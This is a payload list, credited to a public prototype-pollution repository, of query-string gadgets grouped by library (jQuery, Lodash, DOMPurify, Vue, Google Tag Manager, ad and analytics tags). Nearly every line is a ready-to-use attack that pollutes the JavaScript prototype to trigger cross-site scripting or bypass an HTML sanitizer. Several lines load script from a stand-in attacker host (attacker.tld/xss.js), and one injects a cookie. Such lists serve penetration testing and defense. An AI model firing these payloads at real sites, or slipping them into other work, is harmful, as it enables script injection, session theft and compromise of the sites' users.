# Client-side prototype pollution gadgets — BlackFan/client-side-prototype-pollution
# Use with vulnerable query parsers (jQuery BBQ, lodash merge, Vue, etc.)
# Authorized testing only.

# --- jQuery $.get / $.getScript ---
?__proto__[context]=<img/src/onerror=alert(1)>&__proto__[jquery]=x
?__proto__[url][]=data:,alert(1)//&__proto__[dataType]=script
?__proto__[url]=data:,alert(1)//&__proto__[dataType]=script&__proto__[crossDomain]=
?__proto__[src][]=data:,alert(1)//

# --- jQuery $(html) / .off / .attr / .on ---
?__proto__[div][0]=1&__proto__[div][1]=<img/src/onerror=alert(1)>
?__proto__[preventDefault]=x&__proto__[handleObj]=x&__proto__[delegateTarget]=<img/src/onerror=alert(1)>
?__proto__[OnError]=alert(1)&__proto__[SRC]=fake.jpg
?__proto__[handler][]=x&__proto__[selector][]=<img/src/onerror=alert(1)>&__proto__[focus]=x&__proto__[needsContext]=x

# --- Lodash <= 4.17.15 ---
?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)

# --- sanitize-html / js-xss / DOMPurify bypass ---
?__proto__[*][]=onload
?__proto__[innerText]=<img/src/onerror=alert(1)>
?__proto__[whiteList][img][0]=onerror&__proto__[whiteList][img][1]=src
?__proto__[ALLOWED_ATTR][0]=onerror&__proto__[ALLOWED_ATTR][1]=src
?__proto__[documentMode]=9
?__proto__[*%20ONERROR]=1&__proto__[*%20SRC]=1

# --- Google Closure ---
?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//
?__proto__[trustedTypes]=x&__proto__[emptyHTML]=<img/src/onerror=alert(1)>

# --- Marionette / Backbone ---
?__proto__[tagName]=img&__proto__[src][]=x:&__proto__[onerror][]=alert(1)

# --- Vue.js ---
?__proto__[v-if]=_c.constructor('alert(1)')()
?__proto__[attrs][0][name]=src&__proto__[attrs][0][value]=xxx&__proto__[xxx]=data:,alert(1)//&__proto__[is]=script
?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()
?__proto__[data]=a&__proto__[template][nodeType]=a&__proto__[template][innerHTML]=<img/src/onerror=alert(1)>
?__proto__[props][][value]=a&__proto__[name]=":''.constructor.constructor('alert(1)')(),"
?__proto__[template]=<img/src/onerror=alert(1)>

# --- Knockout.js ---
?__proto__[4]=a':1,[alert(1)]:1,'b&__proto__[5]=,

# --- Zepto / Sprint ---
?__proto__[onerror]=alert(1)
?__proto__[html]=<img/src/onerror=alert(1)>
?__proto__[div][intro]=<img/src/onerror=alert(1)>

# --- Third-party tags (analytics, ads, captcha) ---
?__proto__[srcdoc][]=<img/src/onerror=alert(1)>
?__proto__[hif][]=javascript:alert(1)
?__proto__[attrs][src]=1&__proto__[src]=data:,alert(1)//
?__proto__[BOOMR]=1&__proto__[url]=//attacker.tld/xss.js
?__proto__[assethost]=javascript:alert(1)//
?__proto__[vtp_enableRecaptcha]=1&__proto__[srcdoc]=<img/src/onerror=alert(1)>
?__proto__[customScriptSrc]=//attacker.tld/xss.js
?__proto__[dataHost]=attacker.tld/xss.js%23
?__proto__[Config][SiteOptimization][enabled]=1&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?

# --- Google Tag Manager / Analytics require chain ---
?__proto__[q][0][0]=require&__proto__[q][0][1]=x&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js?id=GTM-XXXX

# --- Popper.js transition XSS ---
?__proto__[arrow][style]=color:red;transition:all%201s&__proto__[arrow][ontransitionend]=alert(1)
?__proto__[reference][style]=color:red;transition:all%201s&__proto__[reference][ontransitionend]=alert(2)
?__proto__[popper][style]=color:red;transition:all%201s&__proto__[popper][ontransitionend]=alert(3)

# --- script.aculo.us ---
?x=x&x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror=alert(1)>

# --- i18next ---
?__proto__[lng]=cimode&__proto__[appendNamespaceToCIMode]=x&__proto__[nsSeparator]=<img/src/onerror=alert(1)>
?__proto__[lng]=a&__proto__[key]=<img/src/onerror=alert(1)>

# --- Cookie injection ---
?__proto__[cookieName]=COOKIE=Injection;

# --- Embedly / Segment / Adobe DTM ---
?__proto__[onload]=alert(1)
?__proto__[script][0]=1&__proto__[script][1]=<img/src/onerror=alert(1)>
?__proto__[src]=data:,alert(1)//
?__proto__[SRC]=<img/src/onerror=alert(1)>

# --- Wistia / Swiftype (historical H1 reports) ---
?__proto__[innerHTML]=<img/src/onerror=alert(1)>
?__proto__[xxx]=alert(1)
